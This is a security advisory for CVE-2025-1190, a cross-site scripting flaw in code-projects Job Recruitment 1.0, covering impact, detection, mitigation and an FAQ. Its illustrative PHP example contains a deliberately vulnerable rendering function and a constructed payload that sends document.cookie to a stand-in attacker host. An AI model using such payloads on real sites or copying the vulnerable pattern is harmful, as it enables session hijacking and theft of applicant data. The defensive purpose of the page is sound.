Platform: php
Component: Job Recruitment (code-projects)
Fixed version: 1.0.1
A cross-site scripting (XSS) vulnerability has been identified in code-projects Job Recruitment version 1.0. The flaw lets an attacker inject script into a page served by the application, which can compromise user sessions and data integrity. The vulnerable code is in /_parse/load_user-profile.php and the attack can be launched remotely: the attacker needs no access to the server, only a victim who opens a crafted link or submits crafted input that the endpoint reflects. A fix is available in version 1.0.1.
Successful exploitation of CVE-2025-1190 lets an attacker execute arbitrary JavaScript in the victim's browser within the origin of the Job Recruitment application. From there the script can hijack the session (if the session cookie is readable or can be replayed through authenticated requests), harvest credentials through injected forms, perform actions as the victim, or deface the application. Because the application manages job applicants' personal data, a compromised recruiter or administrator session can expose that data.
CVE-2025-1190 was publicly disclosed on 2025-02-12. No public proof-of-concept (PoC) code has been identified at the time of writing. The CVSS base score of 3.5 (LOW) expresses severity, not likelihood of exploitation; the likelihood estimate is the EPSS figure below. The impact on applicant data nevertheless warrants prompt remediation. This vulnerability is not currently listed in the CISA KEV catalog.
Organizations running code-projects Job Recruitment version 1.0 are at risk, in particular businesses that use it for recruitment and therefore store applicant data in it. Deployments where Job Recruitment shares an origin (same scheme, host and port) with other web applications carry additional risk, because script injected through this flaw runs with that origin's cookies and storage and can reach the other applications as well.
• php / web:
grep -r "load_user-profile.php" /var/www/html/
• generic web:
curl -sI http://your-job-recruitment-site.com/_parse/load_user-profile.php | head -n 1
An HTTP 200 status for that path indicates the affected file is deployed. Checking only the X-Powered-By header tells you the host runs PHP, not whether this application is installed.
Disclosure
Exploitation status
EPSS
0.28% (51st percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2025-1190 is to upgrade Job Recruitment to version 1.0.1 or later, which contains the fix. If upgrading is not immediately feasible, apply input validation and context-aware output encoding in /_parse/load_user-profile.php so that user-supplied values cannot be interpreted as HTML or script. A web application firewall (WAF) with XSS rules can provide a temporary layer of protection, but WAF signatures are routinely bypassed and are not a substitute for fixing the code. Review and update security configurations regularly to keep the attack surface small.
Update to a patched version or apply the security measures provided by the vendor. Escape or sanitize user input in `/_parse/load_user-profile.php` to prevent injection of malicious code. Validate and sanitize all input parameters to prevent XSS attacks.
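The following is an added example, not code from code-projects Job Recruitment and not the actual contents of load_user-profile.php. It shows the general pattern behind this class of flaw in a profile-loading endpoint (a request value written straight into HTML) next to the hardened form recommended above: strict validation for values that have a known shape, and HTML-context output encoding for free text that cannot be allowlisted. The parameter names `user` and `summary`, the identifier format and the HTML layout are assumptions for illustration.

```php
<?php
// Added example for CVE-2025-1190's vulnerability class. Not the project's code.
// Parameter names, identifier format and markup are assumptions.
declare(strict_types=1);

// Vulnerable pattern: request values are concatenated into the page unencoded,
// so ?summary=<script>...</script> executes in the viewer's browser.
function render_profile_vulnerable(array $request): string
{
    $user    = $request['user']    ?? '';
    $summary = $request['summary'] ?? '';
    return '<div class="profile"><h2>' . $user . '</h2><p>' . $summary . '</p></div>';
}

// Hardened pattern, step 1: validate values that have a known shape.
// Assumed identifier format: 1-64 letters, digits, dot, underscore or hyphen.
function validate_user_id(string $value): ?string
{
    return preg_match('/^[A-Za-z0-9._-]{1,64}$/', $value) === 1 ? $value : null;
}

// Hardened pattern, step 2: encode for the HTML body/attribute context at the
// point of output. ENT_QUOTES also encodes single quotes, ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently turning the output into an empty string.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_profile_hardened(array $request): string
{
    $user = validate_user_id((string) ($request['user'] ?? ''));
    if ($user === null) {
        // Reject identifiers that do not match the expected format outright.
        return '<div class="profile">Invalid user identifier.</div>';
    }
    // Free text cannot be allowlisted, so it is encoded rather than filtered:
    // <, >, &, " and ' become entities and the browser renders them as text.
    $summary = html_escape((string) ($request['summary'] ?? ''));
    return '<div class="profile"><h2>' . html_escape($user) . '</h2><p>' . $summary . '</p></div>';
}

// Constructed request payloads for demonstration (not captured traffic).
$attack = [
    'user'    => 'jdoe',
    'summary' => '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
];
$badId = ['user' => '<img src=x onerror=alert(1)>', 'summary' => 'hello'];

echo "vulnerable:\n", render_profile_vulnerable($attack), "\n\n";
echo "hardened (encoded free text):\n", render_profile_hardened($attack), "\n\n";
echo "hardened (rejected identifier):\n", render_profile_hardened($badId), "\n";
```

Run it with `php example.php`. In the vulnerable output the `<script>` element lands in the page verbatim; in the hardened output the same payload appears as `&lt;script&gt;...`, which a browser displays as text and does not execute, and the malformed identifier is refused before it reaches any markup. The encoding must match the output context: `htmlspecialchars` is correct for HTML body and quoted attribute values, but a value placed inside a `<script>` block, a URL, or an inline event handler needs the encoding for that context instead.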
CVE-2025-1190 is a cross-site scripting (XSS) vulnerability affecting code-projects Job Recruitment version 1.0 that lets attackers inject script into pages served by the application.
Yes, if you are running Job Recruitment version 1.0 you are affected by this vulnerability and should upgrade.
Upgrade Job Recruitment to version 1.0.1 or later. As a temporary workaround, add input validation and output encoding to the affected endpoint.
No active exploitation has been confirmed at this time, but prompt remediation is still recommended.
Refer to the code-projects website or security mailing lists for the official advisory regarding CVE-2025-1190.